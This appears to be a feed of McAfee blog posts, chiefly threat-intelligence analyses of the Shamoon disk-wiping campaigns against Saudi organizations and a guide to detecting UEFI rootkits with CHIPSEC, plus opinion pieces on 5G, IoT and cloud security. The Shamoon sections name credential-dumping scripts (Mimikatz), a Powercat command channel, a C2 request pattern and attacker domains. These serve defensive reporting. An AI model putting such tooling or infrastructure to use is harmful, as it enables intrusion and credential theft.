In analyzing attacks, we look at the capabilities and skills actors use. In examining how well an adversary knows its target and infrastructure, we classify this type of noisy scanning and hoping for an exploit as novice behavior. The attacker is hoping for a lucky shot instead of gathering detailed information during the reconnaissance phase.

In the 2016 attack, the reconnaissance phase consisted of spear-phishing attacks, with well-prepared spoofed domains and documents falsified as from certain trustworthy corporate and public-sector organizations. These documents were weaponized with malicious macros to download and execute a variety of backdoor threats. From 2012 we know publicly of two major attacks on victims in the petrochemical industry. In 2016‒17 the attacks were focused on multiple sectors including public, petrochemical, finance but were intended to disrupt a single country: Saudi Arabia.

Weaponization

Once the adversaries gathered the credentials needed to weaponize the wiper malware component, they generally used accounts that would give the right amount of privileges to spread the malware as far as possible through the network. One interesting difference was that in the 2012 case that attackers also inserted default credentials of industrial control systems (ICS) equipment. Clearly the attack was aimed not only at the victims’ office networks but also attempted to disrupt the ICS environments.

In both cases, when the hardcoded date was reached, the wiper started to erase the disks. In 2012 the wiped machines reported to an internal control server that the destruction was a success. In the 2016 Shamoon samples, we found a control server component but to our knowledge it was not used to track the status of destruction.

In one URL parameter (also mentioned by our peers in the industry analyzing this campaign) we find an interesting word:

GET hxxp://server/category/page.php?shinu=ja1p9/

The word shinu can be translated to “what?” in Persian Gulf Arabic slang or “listen” in Farsi.

Until now we have compared the 2012 and 2016‒17 attacks. During our investigation and those by our peers in the industry, we have discovered many relations to other campaigns that used the same domains, whois registrants, or code. One of the examples we found was the reuse of code and exploits used in an attack by the Rocket Kitten group in spring 2016 and its reappearance in the 2016 Shamoon attacks.

A code excerpt from a macro used by Rocket Kitten since spring 2016:

A code excerpt from a macro used in a spear-phishing attack by Shamoon in 2016:

Our peers mentioned some other artifacts that referred to the OilRig campaign, in which Saudi Arabian organizations were targeted using Excel documents that included macros. The macros’ VBS code ran PowerShell and communicated via DNS tunneling.

From an operational security perspective—“How well do the attackers hide details or information about themselves?”—we gave them a low score in both campaigns. Although we saw some manipulation on purpose, for example, the resource language in the 2016 wiper was Yemeni Arabic (likely a reference to the political conflict in the region), and the “wiping picture” accompanied by a photo of the dead Syrian boy on the beach. Still plenty of information was left behind, for example, the reuse of infrastructure and code as well as program database paths in the malware that normally would be removed.

From a risk-analysis perspective, we would give the 2012 adversaries a certain score based on factors such as stealth, operations security, precision, and other factors. If we were to do the same for the 2016‒2017 attacks, we would award a higher score. For example, the attack precision increased due to using spear phishing with payloads instead of using noisy scanning and web shells. Also, the time of persistence in the networks increased compared with that of the 2012 attacks.

Due to the large scale of the attack in 2016‒2017, we saw mistakes in maintaining operational security. We strongly believe that this was caused by the involvement of different groups/individuals with different skills, whereas in 2012 we believe one group was responsible for the attack.

Development cycle

With five years between the attacks, we have likely seen a nation-state actor grow in cyber-offensive capacity and skills. Where once pirated software was used for vulnerability scanning, which can be easily detected by intrusion detection or prevention systems, we now find targeted spear phishing with weaponized documents. And instead of batch scripts, the use of PowerShell scripts and DNS tunneling demonstrates a major increase in the attackers’ expertise.

Note: We wish to acknowledge the efforts of McAfee’s Advanced Programs Group for that team’s extensive contributions to the actor and adversary part of this research.

Want more information? Check out the Q&A or Summary Blog on this topic, and follow us on Twitter @McAfee.

The post The State of Shamoon: Same Actor, Different Lines appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/state-shamoon-actor-different-lines/feed/ 0
Shamoon Returns, Bigger and Badder https://securingtomorrow.mcafee.com/business/shamoon-returns-bigger-badder/ https://securingtomorrow.mcafee.com/business/shamoon-returns-bigger-badder/#respond Wed, 26 Apr 2017 05:01:26 +0000 https://securingtomorrow.mcafee.com/?p=72660 In November 2016, we published a blog that drew comparisons between samples that we had received to that of the 2012 ‘Shamoon’ campaign. Since November, there has been a considerable amount of research corroborating our initial assertions, which we have reviewed against our own continuing analysis. We found that the latest Shamoon campaigns are attacking […]

The post Shamoon Returns, Bigger and Badder appeared first on McAfee Blogs.

]]>
In November 2016, we published a blog that drew comparisons between samples that we had received to that of the 2012 ‘Shamoon’ campaign. Since November, there has been a considerable amount of research corroborating our initial assertions, which we have reviewed against our own continuing analysis. We found that the latest Shamoon campaigns are attacking a wider range of organizations, they are connected to other notable campaigns, and the increase in sophistication suggests investment, collaboration and coordination beyond that of a single hacker group, but rather that of the comprehensive operation of a nation-state. This blog, and the technical details (also now published) is a summary of our continued research into the comparison and growth of the attacks from 2012 – 2017.

A wider group of targets 

In the original campaign, the targets were predominantly focused on the energy sector within Saudi Arabia. In the current instance, we have evidence that the scope of targeted verticals has widened from energy to the public sector, financial services, and others. Although the scope of targets has widened, all the samples we received targeted organizations in Saudi Arabia.

The approach taken by the attackers was all too familiar: once a target was identified, they used spear phishing email as the initial entry vector. From as far back as September 2016, the attackers sent these emails to individuals within target organizations. The messages contained Microsoft Office files embedded with macros, which facilitated back-door access to the organizations. With the necessary reconnaissance concluded, the actors initiated the weaponization of the attack with the intention of disrupting key organizations across Saudi Arabia:

  • Attack Wave 1: Wipe systems on November 17, 2016, at 20:45 Saudi time.
  • Attack Wave 2: Wipe systems on November 29, 2016, at 01:30 Saudi time.
  • Attack Wave 3: Began January 23, 2017, and ongoing, with similar samples and methods and TTPs as in Waves 1 and 2.

The process of wiping infected systems loaded a different image to the original campaign, but with the same devastating effect. The scale of attack—with multiple waves of attacks—suggests a coordinated effort to disrupt a nation that is new compared to the previous campaign.

Links to other campaigns

The linkage to the previous campaign was based on the fact that much of the code was the same; indeed our assessment concluded that there was a 90% reuse of code from the 2012 attacks. However, our examination of this reuse of code led us to identify code from other attack campaigns. For example, code used in the macros from the latest spear-phishing campaign was seen in attacks conducted by the Rocket Kitten hacking group, and the infrastructure used we identified as that used by the Oil-RIG campaign.

Although the current attackers may have connections with a particular nation-state, our analysis focused on the notable increase in the technical expertise since the 2012 campaign. For example, in 2012, the actors moved quickly in and out of the victim network, inflicting system-wipe damage and then disappearing. In 2016, the actors penetrated networks and established remote control to gather intelligence for future planned wiping attacks.

A broader community of collaborators

Based on these and other key differences, we strongly believe that the 2016-17 campaigns benefitted from the development effort of a much wider community of collaborating hacking groups. The recent attacks demonstrate greater technical expertise, yet the wide-ranging nature of the campaign involved many other actors that did not necessarily have the same level of technical expertise as other participants. Poor Operational Security procedures suggest that some parts of the attacks were executed by less experienced operators. Furthermore, it is true that malware can be designed to contain indicators that attribute their attacks to other actors.

Based on our years of investigation into the Shamoon attacks, we do not believe this misdirection tactic was used in the cases we examined.

Though we can argue about the term sophistication, one thing is clear.  This campaign was significantly larger, well-planned, and an intentional attempt to disrupt key organizations and the country of Saudi Arabia.

Attacks on banks in East Asia and on corporations remind us that cyber espionage and system-wiping campaigns are not unique to the Middle East. Rogue state and stateless actors have been known to use similar cyber tools and tactics to achieve military and intelligence objectives they would otherwise be unable to accomplish. Actors such as these have been known to obtain these and other technologies from the black market, if not from each other directly.

To that end, there is no indication that the attackers will not come back again, and, as this latest Shamoon ‘reboot’ has shown, they will come back bigger and stronger again, and again.

Note: We wish to acknowledge the efforts of McAfee’s Advanced Programs Group for that team’s extensive contributions to the actor and adversary part of this research.

For details on this research, please see the McAfee Strategic Intelligence technical blog in Executive Perspectives.

Want even more information? Check out the Q&A blog on this topic and follow us on Twitter @McAfee.

The post Shamoon Returns, Bigger and Badder appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/shamoon-returns-bigger-badder/feed/ 0
Remaining True in the Face of Incredible Responsibility https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/remaining-true-face-incredible-responsibility/ https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/remaining-true-face-incredible-responsibility/#respond Wed, 05 Apr 2017 15:00:40 +0000 https://securingtomorrow.mcafee.com/?p=70947 By now you’ve heard the news: Intel Security has officially rebranded to McAfee. But even though our company name has changed, our values and mission continue to endure: our focus remains on educating our customers through valuable content, collaboration within the industry to share intelligence, and leading in security initaitves and innovations. Ultimately, we’re dedicated […]

The post Remaining True in the Face of Incredible Responsibility appeared first on McAfee Blogs.

]]>
By now you’ve heard the news: Intel Security has officially rebranded to McAfee. But even though our company name has changed, our values and mission continue to endure: our focus remains on educating our customers through valuable content, collaboration within the industry to share intelligence, and leading in security initaitves and innovations. Ultimately, we’re dedicated to not just maintaining, but bettering, what makes us who we are, as we face the most diverse and advanced threat landscape we’ve ever seen.

Creating Valuable Content

Unfortunately, public understanding of cybersecurity as a whole is still lacking. Why? For starters, whenever there’s a major breach, the conversation is focused on the malware behind it, not the overall impact. So users are left asking “so what?” thinking it has nothing to do with their daily lives.

It is clear that there is work to be done when it comes to addressing, analyzing, and educating the public on the current risks that exist in their digital lives. This why we’re sharpening our own threat intelligence content, so that we can start answering the “so what?”

We want to address those issues in a valuable way. So, we’re looking to develop content that is both interesting and relevant. The good news is– with the new McAfee brand, you’re only going to see more of this, as we’re going to keeping driving home content that communicates the what and the why, not just the how.

To accomplish this, we have a team of researchers dedicated to specific threats across different research categories.   Ultimately the responsibility for security firms go beyond simply the provision of technology, with a need to articulate emerging risks to an audience that do not understand the value of information

Sharing is Caring

But it not just up to us. This is a responsibility that rests on the shoulders of the entire industry—and with the new McAfee, we compete by collaborating.

Efforts like the CTA (Cyber Threat Alliance) hold us all to this sense of shared responsibility, and with it we can hold our heads high. But it’s just the start.  We will continue to push forward when it comes to things like openly releasing research  the recently released CHIPSEC framework being the most recent example. Also, the decryption tools made available through the NoMoreRansom site, as well as many other examples.

Staying True to Who We Are

Integrity is a core component of what we do as an industry, and what we do as a company. So no matter what next initiative or innovation we drive, we maintain integrity in everything we do.

It’s like we said before, our name may change, but our mission – and what guides that mission—doesn’t.

Follow us on @McAfee and join the conversation about the new company with #NewMcAfee

The post Remaining True in the Face of Incredible Responsibility appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/remaining-true-face-incredible-responsibility/feed/ 0
CHIPSEC Support Against Vault 7 Disclosure Scanning https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/ https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/#comments Thu, 09 Mar 2017 07:09:36 +0000 https://securingtomorrow.mcafee.com/?p=70292 Following recent WikiLeaks Vault 7 disclosures, including details regarding firmware vulnerabilities, there has been significant concern regarding the integrity of devices and operating systems used within society. As part of our commitment to provide technology that can preserve the integrity of devices we rely upon, we have developed a simple module for the CHIPSEC framework […]

The post CHIPSEC Support Against Vault 7 Disclosure Scanning appeared first on McAfee Blogs.

]]>
Following recent WikiLeaks Vault 7 disclosures, including details regarding firmware vulnerabilities, there has been significant concern regarding the integrity of devices and operating systems used within society.

As part of our commitment to provide technology that can preserve the integrity of devices we rely upon, we have developed a simple module for the CHIPSEC framework that can be used to verify the integrity of EFI firmware executables on potentially impacted systems.

This work is based on many years of dedicated research conducted by the Advanced Threat Research team  within the field of firmware security. CHIPSEC is a framework for analyzing the security of PC platforms including hardware, system firmware (BIOS/UEFI), and platform components. It includes a security test suite, tools for accessing various low-level interfaces, and forensic capabilities. It can be run on Windows, Linux, Mac OS X, and UEFI shell. Instructions for installing and using CHIPSEC can be found in the manual.

NOTE: This software is for security testing purposes. Use at your own risk. Read WARNING.txt before using.

The framework is available at this link: https://github.com/chipsec/chipsec

 

The following outlines a method that can be used to scan system firmware to determine whether it has been modified. The example we present shows the UEFI rootkit found in the HackingTeam disclosure. To test against the most recent disclosures, a known clean list of EFI executable binaries (whitelist) must be developed and can be checked.

Below is an example of using the new tools.uefi.whitelist module on a UEFI firmware image modified to include HackingTeam’s UEFI rootkit.

  1. Generate a whitelist of EFI executable binaries from a clean/original UEFI firmware image (file named “original” in the example below). The list is generated in “original.json.” (This step assumes that there’s a way to obtain a good clean image.) In our example, 276 EFI executables were extracted from the original UEFI firmware image.

# chipsec_main -i -n -m tools.uefi.whitelist -a generate,original.json,original

 

 

[x][ =======================================================================

[x][ Module: Simple whitelist generation/checking for UEFI firmware

[x][ =======================================================================

 

[*] reading firmware from ‘original’…

[*] generating a list of EFI executables from firmware image…

[*] found 276 EFI executables in UEFI firmware image ‘original’

[*] creating JSON file ‘C:\chipsec\original.json’…

 

  1. At a later time, one can verify the integrity of UEFI firmware extracted from flash ROM memory against this list of expected EFI executables. The previous step records hashes in the file efilist.json. In our example, we verify the integrity of another UEFI firmware image, named “unpacked.” Running the tools.uefi.whitelist module against this image with “original.json” containing the expected list (whitelist) of EFI executables yields the following output.

 

# chipsec_main -i -n -m tools.uefi.whitelist -a check,original.json,unpacked

 

[x][ =======================================================================

[x][ Module: Simple whitelist generation/checking for UEFI firmware

[x][ =======================================================================

 

[*] reading firmware from ‘unpacked’…

[*] checking EFI executables against the list ‘C:\chipsec\original.json’

[*] found 279 EFI executables in UEFI firmware image ‘unpacked’

[!] found EFI executable not in the list: d359a9546b277f16bc495fe7b2e8839b5d0389a8

<unknown>

{EAEA9AEC-C9C1-46E2-9D52-432AD25A9B0B}

ed0dc060e47d3225e21489e769399fd9e07f342e2ee0be3ba8040ead5c945efa (sha256)

[!] found EFI executable not in the list: 64d44b705bb7ae4b8e4d9fb0b3b3c66bcbaae57f

rkloader

{F50258A9-2F4D-4DA9-861E-BDA84D07A44C}

3a4cdca9c5d4fe680bb4b00118c31cae6c1b5990593875e9024a7e278819b132 (sha256)

[!] found EFI executable not in the list: 4a1628fa128747c77c51d57a5d09724007692d85

Ntfs

{F50248A9-2F4D-4DE9-86AE-BDA84D07A41C}

dd2b99df1f10459d3a9d173240e909de28eb895614a6b3b7720eebf470a988a0 (sha256)

[!] WARNING: found 3 EFI executables not in the list ‘C:\chipsec\original.json’

 

The tools.uefi.whitelist module found three additional EFI executable binaries, which were not present in the original firmware image. The “unpacked” firmware image has 279 EFI executable binaries including the 276 original executables and three executables injected by the HackingTeam’s UEFI rootkit (rkloader, Ntfs, and an unnamed EFI application).

The preceding example is just for illustration purposes and assumes you’ve extracted EFI firmware on your system prior to generating the whitelist and later before checking the firmware. This can be done with the CHIPSEC framework using the following command:

# chipsec_util spi dump firmware.bin

However, a separate step to dump the firmware image is not required when using the tools.uefi.whitelist module. It extracts EFI firmware from flash ROM memory automatically if the firmware file is not specified.

We recommend generating an EFI whitelist after purchasing a system or when you are sure it has not been infected:

# chipsec_main -m tools.uefi.whitelist -a generate

Then check the EFI firmware on your system periodically or whenever you are concerned, such as when a laptop was left unattended:

# chipsec_main -m tools.uefi.whitelist -a check

In the recent disclosures, another EFI firmware malware for Mac OSX systems, DarkMatter, has surfaced. It appears to include multiple EFI executable components that it injects into the EFI firmware on a target system at different stages of infection. If one has generated a whitelist of known good EFI executables from the firmware image beforehand, then running the new tools.uefi.whitelist module on a system with EFI firmware infected by the DarkMatter persistent implant would likely result in a detection of these extra binaries added to the firmware by the rootkit.

EFI firmware malware is a new frontier for stealth and persistent attacks that may be used by sophisticated adversaries to penetrate and persist within organizations and national infrastructure for a very long time. Use open-source CHIPSEC to defend from this threat and stay safe.

 

Additionally, the recent WikiLeaks disclosure referenced a vulnerability related to the McAfee Security Stinger tool. We can confirm that the Stinger tool issue is no longer present in our current technology. Users downloading the Stinger today will not be subject to attacks using the suggested exploit scenario.

The post CHIPSEC Support Against Vault 7 Disclosure Scanning appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/feed/ 1
The 5G reality https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/the-5g-reality/ https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/the-5g-reality/#respond Tue, 07 Mar 2017 18:15:43 +0000 https://securingtomorrow.mcafee.com/?p=70225 Mobile World Congress has come and gone. With over 100,000 attendees at the show, people gathered around the impressive booths to get a glimpse at what the world’s biggest mobile brands had to offer in 2017. There was definitely a theme of nostalgia at play with the highly anticipated return of the classic Nokia 3310 […]

The post The 5G reality appeared first on McAfee Blogs.

]]>
Mobile World Congress has come and gone. With over 100,000 attendees at the show, people gathered around the impressive booths to get a glimpse at what the world’s biggest mobile brands had to offer in 2017.

There was definitely a theme of nostalgia at play with the highly anticipated return of the classic Nokia 3310 (including Snake!), as well as other exciting and impressive device launches from the likes of LG and Sony.

But walking around the show floor and talking to people over the course of the four days, it became clear it was not the devices taking centre stage, but in fact 5G. Everywhere I looked I saw companies shouting about being at the ‘cutting edge of 5G’.

Now, 5G was definitely on everyone’s radar at last year’s MWC, but this year it felt slightly more real. In fact, Mats Granryd, director-general of GSMA, even said ahead of the show: “We will move away from being vague on the prospects of 5G this year to concrete proposals.” And he was right, we saw this from many of the big mobile players at the show fighting to be seen as being at the forefront of 5G. Because this ‘transformative power’ is no longer just a hype, but set to become a reality in the next few years.

And as exciting as 5G is – and it is incredibly exciting – I’m also concerned about its arrival. Because with 5G comes a world of vulnerabilities – a world of security vulnerabilities that no one seems to be discussing or addressing in their proposals. With 5G comes download speeds of up to 10 gigabits per second (that’s 1,000 times faster than the current US 4G average), but what that also means is thousands more devices introducing more vulnerabilities into a world already struggling to deal with the countless devices flooding the internet.

Our recent Mobile Threats Report found more than 4,000 potentially malicious apps had been removed from Google Play, and 500,000+ devices still have these apps actively installed, putting users’ security at risk. This is happening now in a world of 4G, highlighting the fact that there are existing security issues that we must address before we should even consider bringing 5G to consumers.

As we veer closer to a world of 5G hyper connectivity, we must not forget security. And OK, it may not sound like the sexiest part of the ‘5G revolution’ but it has a huge role to play, and my mind will not be at ease until we start to address it. Because 5G will be an ‘evolution’ and the sooner security is considered the better for all of us.

In the coming months, I hope to see these very companies touting about how they are revolutionising our worlds with 5G telling us how they plan on addressing the security and privacy implications that come with it. It’s key that our safety and security is considered first.

 

The post The 5G reality appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/the-5g-reality/feed/ 0
If we can’t trust technology we won’t (and shouldn’t) use it https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/cant-trust-technology-wont-shouldnt-use/ https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/cant-trust-technology-wont-shouldnt-use/#respond Mon, 27 Feb 2017 16:53:35 +0000 https://securingtomorrow.mcafee.com/?p=69893 Walking this year’s Mobile World Congress I am no longer thrown by the devices, gadgets and flashy booths, but completely mystified at how we as an industry continue to hype up the idea of a truly connected world without addressing one of the most important pieces – security. As someone who’s been in the industry […]

The post If we can’t trust technology we won’t (and shouldn’t) use it appeared first on McAfee Blogs.

]]>
Walking this year’s Mobile World Congress I am no longer thrown by the devices, gadgets and flashy booths, but completely mystified at how we as an industry continue to hype up the idea of a truly connected world without addressing one of the most important pieces – security.

As someone who’s been in the industry for almost 20 years, you’d expect me to be shocked that many businesses still aren’t addressing something so key, especially as consumers are starting to question it. In the last year, more people than ever have started asking me: “So Raj, what about my security?”

Hurrah – finally – some people are catching on, and at least asking the question. But whether or not they’ll act upon it is what concerns me…

Don’t get me wrong. Whilst it’s great some people are waking up to the realities that come with a connected lifestyle which, let’s admit is everyone at this stage, there is still a lot of work to do. Ultimately, it’s the industry’s – that’s right, every single person at MWC and beyond – job to lead this.

Because at the moment we’re failing. Our recent survey, for example, found half of us have no idea how to check if our devices have ever been compromised and a third are unsure how to check if a device has been breached. So although many may be starting to consider device security, it doesn’t mean they necessarily know how to manage it. Yet, here we are at MWC giving these same people even more technologically advanced devices to play with – when we know most are unsure how to protect themselves – whether that’s with their phones, computers, kids toys, or now – connected homes and cars.

The truth is that with awesome technology comes great responsibility.  So what do we – both consumers and businesses alike – do to ensure that such technology coming out of big shows like this are safe?

  • Put security first: security cannot be an afterthought in any device manufacturing process. It must be considered upfront by manufacturers in order for any underlining issues to be addressed and catered to
  • Be transparent: enough of the hiding, let’s be honest with consumers about the risks associated with using certain technology. Instead of hiding away and hoping it’s all ok, vendors must at least educate and advise the user on how to best protect themselves including recommending security software suitable for that technology
  • Take control: whilst I want to see manufacturers leading the way when it comes to security, consumers can and should do their bit too. Take device security at home for example where the home network is the hub for all connected devices. New solutions, such as McAfee Secure Home Platform, will help people easily manage and protect devices connected to this network while providing parental controls with permissions that can be tailored to the entire household

 

We must be able to trust the new technology that’s making our world a hyper-connected one – as inventors, product developers, manufacturers, technology leaders from the word ‘go’ in our development cycles, through to the consumers’ lives when they use it. Trust has fallen down across our societies because of all the security hacks, risks and wider vulnerabilities that technology has opened up. It’s our job – each and every one of us – to help change that via our actions as an industry. Let’s continue producing amazing and innovative technology that helps change and advance our lives, but let’s protect ourselves – our friends, our economies, our neighbours and the wider industry – while we do. The more we can work together to build this trust, the better off each technology will be for everyone.

The post If we can’t trust technology we won’t (and shouldn’t) use it appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/cant-trust-technology-wont-shouldnt-use/feed/ 0
Technology companies should ‘at least do no harm’ https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/technology-companies-least-no-harm/ https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/technology-companies-least-no-harm/#respond Wed, 22 Feb 2017 17:38:36 +0000 https://securingtomorrow.mcafee.com/?p=69676 Mobile World Congress (MWC) provides yet another opportunity for technology giants to flex their muscles and whip the industry into a frenzy. Even more-so than last year, mobile is a reflection of the Internet of Things (IoT) and the hyper-connected world we find ourselves living in. Following in the footsteps of CES, I expect to […]

The post Technology companies should ‘at least do no harm’ appeared first on McAfee Blogs.

]]>
Mobile World Congress (MWC) provides yet another opportunity for technology giants to flex their muscles and whip the industry into a frenzy. Even more-so than last year, mobile is a reflection of the Internet of Things (IoT) and the hyper-connected world we find ourselves living in. Following in the footsteps of CES, I expect to see a heavy focus on ‘smart’ technology as everything from hairbrushes to fridges and even pregnancy tests look to receive an IP overhaul.

But as companies battle to stay ahead of the competition, racing to bring innovative products to market, many are stumbling when it comes to security. And I’m worried.

In the last year alone, some of the worst IoT vulnerabilities have come to light, with the security of connected cars and even pacemakers being called into question. Never mind the threat of identity and financial theft, if cybercriminals are able to hack and control these objects, consumers’ physical health and safety could be at risk.

Traditionally in the automotive industry, for example, every aspect of the car would be rigorously tested to ensure drivers and passengers are as safe as possible. However, we haven’t seen the same stringent approach taken to protecting our increasingly computerised cars from hackers. Although driverless cars may not be mainstream, research from McAfee suggests 78% of new cars will be connected to the Internet by 2022 and therefore open to potential security breaches.

The lack of importance placed on cybersecurity has filtered through to consumers and is reflected in attitudes to data protection in connected devices. People wouldn’t dream of driving a car off the forecourt without seatbelts, yet they’ll happily invest in the next flashy car without knowing whether it has adequate cyber security in place.

MWC is the perfect platform for influential figures within technology and the wider industries such as health and automotive, which are investing heavily in connected devices, to discuss the ramifications of our increasingly connected world. We must continue to innovate, but we also have to work together to ensure that the latest technology doesn’t put consumers’ data or safety at risk. As an industry, we need to develop strict standards for manufacturers, with clear consequences for falling short of these standards.

Consumers also have a responsibility to drive change. If consumers refuse to buy products that are not properly secured, companies developing such products will start to take note and we’ll see security becoming more of a priority.

Data security is not a trend, it’s an ethical issue that holds the potential to impact us all if not taken seriously. With 5G on our doorsteps, hyper-connectivity will soon be a reality and more data than ever before will be transferred across networks via millions of devices. It’s imperative that we get security right and ensure products do not pose a threat to users.

As my colleague, Chris Young, said at this year’s RSA, “we have to start thinking of ourselves as smaller players in a bigger fight… we’re better when we link arms with like-minded partners, intent on the same goals.”

But if further collaboration is too much to ask, the Hippocratic oath is a simple philosophy that those involved in developing our connected world would do well to take note of: ‘help, or at least do no harm’.

The post Technology companies should ‘at least do no harm’ appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/technology-companies-least-no-harm/feed/ 0
Cloud Ubiquity – it’s coming, but not yet! https://securingtomorrow.mcafee.com/business/cloud-security/cloud-ubiquity-coming-not-yet/ https://securingtomorrow.mcafee.com/business/cloud-security/cloud-ubiquity-coming-not-yet/#respond Mon, 13 Feb 2017 05:00:47 +0000 https://securingtomorrow.mcafee.com/?p=68758 Brace yourself, adoption of cloud computing is on its way with 93% of organizations using cloud services today.  Just don’t ask when ubiquity will occur!  One year later, and the question about the number of months until IT budgets are 80% in the cloud is down from 16 months to ‘only’ 15.  Technically speaking, ubiquity […]

The post Cloud Ubiquity – it’s coming, but not yet! appeared first on McAfee Blogs.

]]>
Brace yourself, adoption of cloud computing is on its way with 93% of organizations using cloud services today.  Just don’t ask when ubiquity will occur!  One year later, and the question about the number of months until IT budgets are 80% in the cloud is down from 16 months to ‘only’ 15.  Technically speaking, ubiquity should happen somewhere around April 2018.  However, migrating to the cloud is not as simple as it seems.

The intention to move to the cloud is definitely there-trust in the cloud has risen, with those trusting public cloud outweighing those who distrust 2:1. However, a number of obstacles are impacting the full migration toward cloud computing.  One of these obstacles is something that has been discussed for some time now, and confirmed by our recent survey, the talent shortage. The majority of enterprises have slowed their cloud adoption due to the lack of cybersecurity skills on their staff.

The above statistic is a little surprising at first glance.  A well-documented advantage of cloud computing has been to allow organizations to focus on their core business, leaving the technical challenges of managing server infrastructure and security to specialist providers.   However, the above clearly demonstrates that the old adage “that you can outsource the work but not the risk” rings true with many organizations. This begs the question whether the above skills are the same as those sought for internally provisioned services. I remember participating in a panel with Jim Reavis from the Cloud Security Alliance and the consensus was that technical skills will be less in demand for enterprises, as demands shift to skills  to monitor the security posture of controls deployed by third parties (e.g. more management).

Our survey indicated 74% of organizations are storing sensitive data in the public cloud and personal customer information is the most popular form of this sensitive data. This leads us to believe that the demand for data visibility and protection skills will be on the rise.   Data protection requirements demand that the data controller (enterprise)  must ensure that the data processor (service provider) still has the appropriate controls in place.

Unfortunately, when IT says “no” to the lines of business, perhaps due to the skills shortage, the lines of business are adopting cloud on their own.  In fact, 40% of cloud services are being procured outside the visibility and control of the IT department.  This is even more worrisome for your data protection security posture and begs the consideration of automated tools for cloud data protection.

 

The post Cloud Ubiquity – it’s coming, but not yet! appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/cloud-security/cloud-ubiquity-coming-not-yet/feed/ 0
Spotlight on Shamoon https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/spotlight-on-shamoon/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/spotlight-on-shamoon/#comments Fri, 27 Jan 2017 18:59:46 +0000 https://securingtomorrow.mcafee.com/?p=68479 Our analysis this month has pointed to Shamoon emerging in the Middle East. We have recently seen a number of similarities that we had highlighted in our earlier blogs (on mcafee.com). The campaign continues to target organizations in the Middle East from a variety of verticals. Reports suggest that a further 15 disk-wiping Shamoon incidents […]

The post Spotlight on Shamoon appeared first on McAfee Blogs.

]]>
Our analysis this month has pointed to Shamoon emerging in the Middle East. We have recently seen a number of similarities that we had highlighted in our earlier blogs (on mcafee.com). The campaign continues to target organizations in the Middle East from a variety of verticals. Reports suggest that a further 15 disk-wiping Shamoon incidents have occurred in public and private sectors.

Rev.2 campaign

The code for the current revision is almost identical to the original version: Changes include the addition of a victim’s credentials to spread and execute the wiper in a large part of the environment. In the following screenshot, we can see that the old encoded resource names PKCS12, PKCS7, and X509 are still present in the new variants but not used.

Screen Shot 2017-01-27 at 10.47.27 AM

A question that many of us in the industry have asked ourselves is How were the attackers able to gain the credentials from so many victims in the Middle East? Let’s approach this from the attacker’s view and follow the Cyber Kill Chain steps.

Reconnaissance

An attack group prepares a plan and identifies the victims it wants to hit to create an impact or make a statement. The group gathers email addresses and other open-source intelligence as the first step to preparing for the campaign. They register domains, code backdoors, and prepare for the reconnaissance phase. When all is tested, the initial attack starts with spear phishing:

Screen Shot 2017-01-27 at 10.47.12 AM

The victims receive emails, for example, one like the preceding business proposal. The email also contains a tempting attachment. When opening the attachment, some victims saw this:

Screen Shot 2017-01-27 at 10.49.37 AM

Any requirement to activate macros before seeing content should set off alarm bells. Analyzing the document, we received confirmation of our suspicions:

Screen Shot 2017-01-27 at 10.46.48 AM

Decoding the obfuscated macro code results in a PowerShell script that proceeds to download a file, a Trojan capable of gathering system information and downloading other tools.

In other cases, we found a backdoor using a PowerShell script to gather information from the system and write to a temporary file. A code snippet:

Screen Shot 2017-01-27 at 10.46.25 AM

We also found a script that creates an instance of Mimikatz, a tool known to dump user credentials from a computer:

  • CreateMimi1.Bat or CreateMimi2.Bat

When all the data are gathered, the information is uploaded. To open a command channel, the attackers used, for example, a PowerShell script that launches Powercat, a TCP/IP “Swiss army knife” that works with netcat. A code example:

Screen Shot 2017-01-27 at 10.46.04 AM

Weaponization

The attackers invariably sort the credentials of the victims to gain an indication of the IP range and possible scale of the network. Depending on the goal of the attack, a selection of victims can be made to serve the cause. From the original Shamoon code, the current attackers have made several changes:

  • Added victims’ credentials
  • Replaced picture from flag to boy
  • Changed resource language to Yemeni Arabic
  • Tested samples

Delivery/Exploitation/Installation/Control servers/Action on objectives

In these phases, the actors needed only one or two hosts in the victim’s network as a beachhead to upload the wipers and scripts. Because the attackers already had valid credentials, no exploitation was needed.

Batch file:

Screen Shot 2017-01-27 at 10.45.44 AM

The batch file copies ntertmgr32.exe (one of many filenames of the Shamoon 2 variant) and starts it. Once the hardcoded date was reached, systems were wiped. Objective accomplished.

Actor sophistication

Our analysis of the execution of this attack tells a story about the actors capability and skills. Their attack precision is very good; they know whom and what to attack, in this case to disrupt and leave a statement. Their focus is on Windows and they use well-known practices to gather information and credentials, with no zero days. From a coding perspective, many security industry colleagues have already commented on the sloppy coding practices. From an operations security perspective—how well are the actors able to hide details that could lead to them?—we noticed that quite a few details are available: email addresses, program database paths, and Yemeni Arabic as the language identifier of almost all the samples, although we discovered one sample with a different language identifier. Was that on purpose, or a slip by the actor because this was a large campaign?

Indicators

Domains:

  • winappupdater.com
  • update.winupdater.com
  • // domain registered on 2016-11-25 by benyamin987@mail.com
  • hash 146a112cb01cd4b8e06d36304f6bdf7b and bf4b07c7b4a4504c4192bd68476d63b5 were connecting to this site

Hashes:

